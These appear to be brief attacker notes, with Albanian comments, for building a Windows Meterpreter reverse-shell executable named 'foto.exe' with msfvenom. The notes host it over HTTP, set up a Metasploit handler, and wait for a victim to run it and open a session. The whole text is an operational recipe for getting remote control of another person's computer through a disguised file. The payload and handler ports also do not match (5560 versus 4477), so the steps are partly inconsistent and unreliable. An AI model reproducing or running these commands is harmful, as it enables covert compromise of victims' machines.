msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -f exe -o foto.exe mv foto.exe tmp/ python -m SimpleHTTPServer 80 msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > show options msf exploit(multi/handler) >set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > show options msf exploit(multi/handler) > set lhost 172.16.60.68 msf exploit(multi/handler) > set lport 4477 msf exploit(multi/handler) > exploit pret deri sa te executon dikush malware, ne kete rast te hostuar ne http pasi te executohet malware vjen sessioni sessions sessions -i 5 --numrin e sesionit